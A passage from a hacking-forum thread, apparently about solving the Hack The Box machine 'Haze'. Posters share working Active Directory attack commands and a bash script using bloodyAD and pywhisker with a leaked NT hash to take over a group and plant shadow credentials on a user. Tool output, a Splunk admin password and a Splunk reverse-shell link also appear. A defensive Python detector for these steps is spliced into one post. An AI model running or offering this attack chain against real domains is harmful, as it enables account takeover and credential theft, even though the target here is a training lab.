Haze - Hack The Box Season 7 - Windows Hard
by ShitWhiffler - Saturday March 29, 2025 at 06:59 PM
#41
(Mar 30, 2025, 05:53 PM)GooseFountain82393 Wrote:
(Mar 30, 2025, 04:48 PM)x1rx Wrote:
(Mar 30, 2025, 04:37 PM)GooseFountain82393 Wrote:
(Mar 30, 2025, 11:40 AM)Qwelybreachy Wrote: You can use it like this :

python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u 'Haze-IT-Backup$' -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'mark.adams'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'edward.martin'

After that, I don't know how to get edward.martin NTLM Hash to do a PTH using evil-winrm. I'm stuck.

You'll need Pywhisker and PKINIT after that.

It seems pywhisker isn't working for me, any idea?
1 - owner edit - success
2 - genericall permission - success
3 - edward.martin added to group support_services - success
4 - (extra) mark.adams added to group support_services - success

but pywhiskers fails

bash exploit.sh 10.129.43.247
[*]Setting owner and permissions...
[*]Running: bloodyAD set owner SUPPORT_SERVICES Haze-IT-Backup$
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES

[*]Running: bloodyAD add genericAll SUPPORT_SERVICES Haze-IT-Backup$
[+] Haze-IT-Backup$ has now GenericAll on SUPPORT_SERVICES

[*]Adding users to group...
[*]Adding mark.adams to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES mark.adams
[+] mark.adams added to SUPPORT_SERVICES

[*]Adding edward.martin to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES edward.martin
[+] edward.martin added to SUPPORT_SERVICES

[*]Executing pywhisker actions...
[*]Adding mark.adams via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Mark Adams,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 11b779bd-71a5-64d4-2f54-b912ccf9c79e
[*]Updating the msDS-KeyCredentialLink attribute of mark.adams
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0


[*]Adding edward.martin via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: d5d7fa4b-7628-56c3-302c-778701bce5b4
[*]Updating the msDS-KeyCredentialLink attribute of edward.martin
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0


[*]Script execution completed.


This is my script for all commands in one script

#!/bin/bash

HOST="$1"
DOMAIN="haze.htb"
USER="Haze-IT-Backup$"
PASS=":735C02C6B2DC54C3C8C6891F55279EBC"
FORMAT="rc4"
GROUP="SUPPORT_SERVICES"
USERS=("mark.adams" "edward.martin")

log() {
    echo "
[*]$1"
}

# Function to run bloodyAD commands
run_bloodyAD() {
    log "Running: bloodyAD $*"
    bloodyAD --host "$HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" -f "$FORMAT" "$@"
    echo
}

log "Setting owner and permissions..."
run_bloodyAD set owner "$GROUP" "$USER"
run_bloodyAD add genericAll "$GROUP" "$USER"

log "Adding users to group..."
for u in "${USERS[@]}"; do
    log "Adding $u to $GROUP..."
    run_bloodyAD add groupMember "$GROUP" "$u"
done

log "Executing pywhisker actions..."
for u in "${USERS[@]}"; do
    log "Adding $u via pywhisker..."
    pywhisker -d "$DOMAIN" -u "$USER" -H "$PASS" --target "$u" --action add
    echo
done

log "Script execution completed."

Great work. You're almost there. The only difference is PyWhisker only wants the NTHASH, like this:

python3 pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H '735c02c6b2dc54c3c8c6891f55279ebc' --target 'edward.martin' --action "add"

[*]Searching for the target account
[*]Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 50ae3ac9-448c-41b5-0098-3b7913be617c
[*]Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*]Converting PEM -> PFX with cryptography: srecZwEO.pfx
[+] PFX exportiert nach: srecZwEO.pfx
[i] Passwort für PFX: qM3EjnYvZ6RXIfSlUkZX
[+] Saved PFX (#PKCS12) certificate & key at path: srecZwEO.pfx
[*]Must be used with password: qM3EjnYvZ6RXIfSlUkZX
[*]A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Ah - I spotted the error now. You need to add HAZE-IT-BACKUP to the Support_services group. Not Edward or Mark
bloodyAD --host "$IP" -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' add groupMember "SUPPORT_SERVICES" "Haze-IT-Backup$"

Ah, thank you so much — I hadn't noticed that error. I thought 'Haze-IT-Backup$' were already part of the group since I had set him as the owner with full control.
It worked much better, and I was able to use PKINITtools to finally understand how to get to the point of retrieving edward.martin's NT hash.
Reply
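Seen from the detection side, the sequence worked out in the post above (ownership and ACL edits on SUPPORT_SERVICES, the service account adding itself to the group, then a write to msDS-KeyCredentialLink on edward.martin) leaves a correlatable trail in the domain controller's Security log. The following is an added example, not code from any poster in this thread: it assumes Directory Service Changes auditing (event 5136) and group-management auditing (event 4728) are enabled, and the event records, SIDs, group DN, the WS01$ host and the 30-minute window are constructed for illustration.

```python
from datetime import datetime, timedelta

VALUE_ADDED = "%%14674"             # 5136 OperationType meaning "Value Added"
WINDOW = timedelta(minutes=30)      # assumption: look-back window for precursors
GROUP_DN = "CN=Support_Services,CN=Users,DC=haze,DC=htb"  # constructed DN
SVC_SID = "S-1-5-21-1-2-3-1111"     # constructed SID for Haze-IT-Backup$
ADMIN_SID = "S-1-5-21-1-2-3-500"    # constructed SID for an administrator


def ev(time, event_id, user, sid, **fields):
    """Build one simplified event record (field names follow the real events)."""
    return {"time": datetime.fromisoformat(time), "id": event_id,
            "SubjectUserName": user, "SubjectUserSid": sid, **fields}


# Constructed sample records shaped like Security events 5136 and 4728.
SAMPLE_EVENTS = [
    # Routine admin work: someone else is added to the group (not a self-add).
    ev("2025-03-30T09:00:00", 4728, "Administrator", ADMIN_SID,
       TargetUserName="Support_Services", MemberSid="S-1-5-21-1-2-3-1200"),
    # Owner change, then ACE added: both are nTSecurityDescriptor writes.
    ev("2025-03-30T16:00:00", 5136, "Haze-IT-Backup$", SVC_SID, ObjectDN=GROUP_DN,
       AttributeLDAPDisplayName="nTSecurityDescriptor", OperationType=VALUE_ADDED),
    ev("2025-03-30T16:00:05", 5136, "Haze-IT-Backup$", SVC_SID, ObjectDN=GROUP_DN,
       AttributeLDAPDisplayName="nTSecurityDescriptor", OperationType=VALUE_ADDED),
    # The account adds itself to the group it just took over.
    ev("2025-03-30T16:00:10", 4728, "Haze-IT-Backup$", SVC_SID,
       TargetUserName="Support_Services", MemberSid=SVC_SID),
    # Key credential written onto another user's object.
    ev("2025-03-30T16:01:00", 5136, "Haze-IT-Backup$", SVC_SID,
       ObjectDN="CN=Edward Martin,CN=Users,DC=haze,DC=htb",
       AttributeLDAPDisplayName="msDS-KeyCredentialLink", OperationType=VALUE_ADDED),
    # Isolated key write by a workstation account, with no precursor activity.
    ev("2025-03-30T18:00:00", 5136, "WS01$", "S-1-5-21-1-2-3-2001",
       ObjectDN="CN=WS01,CN=Computers,DC=haze,DC=htb",
       AttributeLDAPDisplayName="msDS-KeyCredentialLink", OperationType=VALUE_ADDED),
]


def is_attr_write(e, attr):
    """True for a 5136 'value added' record on the named LDAP attribute."""
    return (e["id"] == 5136 and e.get("OperationType") == VALUE_ADDED
            and e.get("AttributeLDAPDisplayName", "").lower() == attr.lower())


def is_precursor(e):
    """Owner/ACL edit, or a principal adding itself to a global security group."""
    if is_attr_write(e, "nTSecurityDescriptor"):
        return True
    return e["id"] == 4728 and e.get("MemberSid") == e["SubjectUserSid"]


def detect(events, allowed_writers=frozenset()):
    """Flag msDS-KeyCredentialLink writes; raise severity when the same
    subject changed ACLs or group membership shortly beforehand."""
    events = sorted(events, key=lambda e: e["time"])
    findings = []
    for e in events:
        if not is_attr_write(e, "msDS-KeyCredentialLink"):
            continue
        if e["SubjectUserName"] in allowed_writers:   # known provisioning accounts
            continue
        pre = [p for p in events
               if p["SubjectUserSid"] == e["SubjectUserSid"]
               and timedelta(0) <= e["time"] - p["time"] <= WINDOW
               and is_precursor(p)]
        findings.append({
            "actor": e["SubjectUserName"],
            "target": e["ObjectDN"],
            "severity": "high" if pre else "medium",
            "precursors": [(p["id"], p.get("ObjectDN") or p.get("TargetUserName"))
                           for p in pre],
        })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Failed attempts such as the INSUFF_ACCESS_RIGHTS runs quoted above change nothing in the directory, so they do not produce 5136 records; only the successful write is visible to this check.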
#42
(Mar 29, 2025, 10:39 PM)whaleflight Wrote:
(Mar 29, 2025, 10:16 PM)kyakeiuwu Wrote:
(Mar 29, 2025, 10:12 PM)pop10189 Wrote:
(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:
(Mar 29, 2025, 09:55 PM)pop10189 Wrote: you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?

look for GMSA section https://notes.qazeer.io/active-directory...exploiting

 Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa

Account: Haze-IT-Backup$      NTLM:

I literally got this as the hash no NTLM


Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
$user = Get-ADUser -Identity "mark.adams"
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName

then gMSADumper should work

Any idea on how to do this from Linux?
Reply
#43
the bloodyAD part doesn't work for me, throws invalid credentials...
Reply
#44
(Mar 30, 2025, 04:37 PM)GooseFountain82393 Wrote:
(Mar 30, 2025, 11:40 AM)Qwelybreachy Wrote: You can use it like this :

python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u 'Haze-IT-Backup$' -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'mark.adams'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'edward.martin'

After that, I don't know how to get edward.martin NTLM Hash to do a PTH using evil-winrm. I'm stuck.

You'll need Pywhisker and PKINIT after that.
Why? I don't see any permissions from Support_Services group that hints towards ShadowCredentials (bloodhound/powerview), could you elaborate? Thanks
Nvm, for some reason the outbound permission didn't appear. I collected again the domain information with haze-it-backup$ and now outbound permission showed.
Reply
#45
(Mar 30, 2025, 04:14 AM)rootme1122 Wrote:
(Mar 30, 2025, 04:05 AM)zippo99 Wrote:
(Mar 30, 2025, 01:32 AM)maggi Wrote: https://github.com/0xjpuff/reverse_shell_splunk

Then throw a potato at the box

yeah thats what I wanted to do, but how do you log into splunk? We don't have credentials that allow us to log in. We can only get the "Ld@p_Auth..." one from exploiting the LFI CVE. can't log into splunk with that one.


admin
Sp1unkadmin@2k24


how did y'all get this password? can't seem to find it anywhere...
Reply
#46
(Mar 30, 2025, 11:45 PM)arrogantoverlord Wrote:
(Mar 30, 2025, 04:14 AM)rootme1122 Wrote:
(Mar 30, 2025, 04:05 AM)zippo99 Wrote:
(Mar 30, 2025, 01:32 AM)maggi Wrote: https://github.com/0xjpuff/reverse_shell_splunk

Then throw a potato at the box

yeah thats what I wanted to do, but how do you log into splunk? We don't have credentials that allow us to log in. We can only get the "Ld@p_Auth..." one from exploiting the LFI CVE. can't log into splunk with that one.


admin
Sp1unkadmin@2k24


how did y'all get this password? can't seem to find it anywhere...

I am stuck on the same problem. I have the admin password hash from the backup folder but I am not able to crack it/find the cleartext password somewhere
Reply
#47
(Mar 30, 2025, 05:53 PM)GooseFountain82393 Wrote:
(Mar 30, 2025, 04:48 PM)x1rx Wrote:
(Mar 30, 2025, 04:37 PM)GooseFountain82393 Wrote:
(Mar 30, 2025, 11:40 AM)Qwelybreachy Wrote: You can use it like this :

python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u 'Haze-IT-Backup$' -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 set owner 'SUPPORT_SERVICES' 'Haze-IT-Backup$'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add genericAll "SUPPORT_SERVICES" "Haze-IT-Backup$"
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'mark.adams'
python3 bloodyAD.py --host "$machineIP" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735C02C6B2DC54C3C8C6891F55279EBC" -f rc4 add groupMember 'SUPPORT_SERVICES' 'edward.martin'

After that, I don't know how to get edward.martin NTLM Hash to do a PTH using evil-winrm. I'm stuck.

You'll need Pywhisker and PKINIT after that.

It seems pywhisker isn't working for me, any idea?
1 - owner edit - success
2 - genericall permission - success
3 - edward.martin added to group support_services - success
4 - (extra) mark.adams added to group support_services - success

but pywhiskers fails

bash exploit.sh 10.129.43.247
[*]Setting owner and permissions...
[*]Running: bloodyAD set owner SUPPORT_SERVICES Haze-IT-Backup$
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES

[*]Running: bloodyAD add genericAll SUPPORT_SERVICES Haze-IT-Backup$
[+] Haze-IT-Backup$ has now GenericAll on SUPPORT_SERVICES

[*]Adding users to group...
[*]Adding mark.adams to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES mark.adams
[+] mark.adams added to SUPPORT_SERVICES

[*]Adding edward.martin to SUPPORT_SERVICES...
[*]Running: bloodyAD add groupMember SUPPORT_SERVICES edward.martin
[+] edward.martin added to SUPPORT_SERVICES

[*]Executing pywhisker actions...
[*]Adding mark.adams via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Mark Adams,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 11b779bd-71a5-64d4-2f54-b912ccf9c79e
[*]Updating the msDS-KeyCredentialLink attribute of mark.adams
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0


[*]Adding edward.martin via pywhisker...
[*]Searching for the target account
[*]Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: d5d7fa4b-7628-56c3-302c-778701bce5b4
[*]Updating the msDS-KeyCredentialLink attribute of edward.martin
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0


[*]Script execution completed.


This is my script for all commands in one script

#!/bin/bash

HOST="$1"
DOMAIN="haze.htb"
USER="Haze-IT-Backup$"
PASS=":735C02C6B2DC54C3C8C6891F55279EBC"
FORMAT="rc4"
GROUP="SUPPORT_SERVICES"
USERS=("mark.adams" "edward.martin")

log() {
    echo "
[*]$1"
}

# Function to run bloodyAD commands
run_bloodyAD() {
    log "Running: bloodyAD $*"
    bloodyAD --host "$HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" -f "$FORMAT" "$@"
    echo
}

log "Setting owner and permissions..."
run_bloodyAD set owner "$GROUP" "$USER"
run_bloodyAD add genericAll "$GROUP" "$USER"

log "Adding users to group..."
for u in "${USERS[@]}"; do
    log "Adding $u to $GROUP..."
    run_bloodyAD add groupMember "$GROUP" "$u"
done

log "Executing pywhisker actions..."
for u in "${USERS[@]}"; do
    log "Adding $u via pywhisker..."
    pywhisker -d "$DOMAIN" -u "$USER" -H "$PASS" --target "$u" --action add
    echo
done

log "Script execution completed."

Great work. You're almost there. The only difference is PyWhisker only wants the NTHASH, like this:

python3 pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H '735c02c6b2dc54c3c8c6891f55279ebc' --target 'edward.martin' --action "add"

[*]Searching for the target account
[*]Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*]Generating certificate
[*]Certificate generated
[*]Generating KeyCredential
[*]KeyCredential generated with DeviceID: 50ae3ac9-448c-41b5-0098-3b7913be617c
[*]Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*]Converting PEM -> PFX with cryptography: srecZwEO.pfx
[+] PFX exportiert nach: srecZwEO.pfx
[i] Passwort für PFX: qM3EjnYvZ6RXIfSlUkZX
[+] Saved PFX (#PKCS12) certificate & key at path: srecZwEO.pfx
[*]Must be used with password: qM3EjnYvZ6RXIfSlUkZX
[*]A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Ah - I spotted the error now. You need to add HAZE-IT-BACKUP to the Support_services group. Not Edward or Mark
bloodyAD --host "$IP" -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' add groupMember "SUPPORT_SERVICES" "Haze-IT-Backup$"


Thank you, adding Haze-IT-Backup$ and edward.martin to the group worked.


That is the final script:

#!/bin/bash

HOST="$1"
DOMAIN="haze.htb"
USER="Haze-IT-Backup$"
PASS=":735C02C6B2DC54C3C8C6891F55279EBC"
FORMAT="rc4"
GROUP="SUPPORT_SERVICES"
CONTROLLED_USER="Haze-IT-Backup$"
TARGET_USER="edward.martin"

log() {
    echo "
[*]$1"
}

# Function to run bloodyAD commands
run_bloodyAD() {
    log "Running: bloodyAD $*"
    bloodyAD --host "$HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" -f "$FORMAT" "$@"
    echo
}

log "Setting owner and permissions..."
run_bloodyAD set owner "$GROUP" "$CONTROLLED_USER"
run_bloodyAD add genericAll "$GROUP" "$CONTROLLED_USER"

log "Adding users to group..."
log "Adding $TARGET_USER to $GROUP..."
run_bloodyAD add groupMember "$GROUP" "$TARGET_USER"
log "Adding $CONTROLLED_USER to $GROUP..."
run_bloodyAD add groupMember "$GROUP" "$CONTROLLED_USER"

log "Adding $TARGET_USER via pywhisker..."
pywhisker -d "$DOMAIN" -u "$USER" -H "$PASS" --target "$TARGET_USER" --action add
echo

log "Script execution completed."
Reply
#48
(Mar 31, 2025, 02:00 AM)dimly5252 Wrote:
(Mar 30, 2025, 11:45 PM)arrogantoverlord Wrote:
(Mar 30, 2025, 04:14 AM)rootme1122 Wrote:
(Mar 30, 2025, 04:05 AM)zippo99 Wrote:
(Mar 30, 2025, 01:32 AM)maggi Wrote: https://github.com/0xjpuff/reverse_shell_splunk

Then throw a potato at the box

yeah thats what I wanted to do, but how do you log into splunk? We don't have credentials that allow us to log in. We can only get the "Ld@p_Auth..." one from exploiting the LFI CVE. can't log into splunk with that one.


admin
Sp1unkadmin@2k24


how did y'all get this password? can't seem to find it anywhere...

I am stuck on the same problem. I have the admin password hash from the backup folder but I am not able to crack it/find the cleartext password somewhere

There's a splunk legacy password hash, and use the recovered splunk.secret to decryptSplus
Reply
#49
(Mar 31, 2025, 03:35 AM)Axura Wrote:
(Mar 31, 2025, 02:00 AM)dimly5252 Wrote:
(Mar 30, 2025, 11:45 PM)arrogantoverlord Wrote:
(Mar 30, 2025, 04:14 AM)rootme1122 Wrote:
(Mar 30, 2025, 04:05 AM)zippo99 Wrote: yeah thats what I wanted to do, but how do you log into splunk? We don't have credentials that allow us to log in. We can only get the "Ld@p_Auth..." one from exploiting the LFI CVE. can't log into splunk with that one.


admin
Sp1unkadmin@2k24


how did y'all get this password? can't seem to find it anywhere...

I am stuck on the same problem. I have the admin password hash from the backup folder but I am not able to crack it/find the cleartext password somewhere

There's a splunk legacy password hash, and use the recovered splunk.secret to decryptSplus
Do you mean that there is a legacy hash in the Backups or there is a legacy hash in the current production environment (Besides the binddn hash)?
Reply
#50
Can someone post an explanation for getting edward martin? I don't get it, why are you using pywhisker and what made y'all think you should use it?
Reply

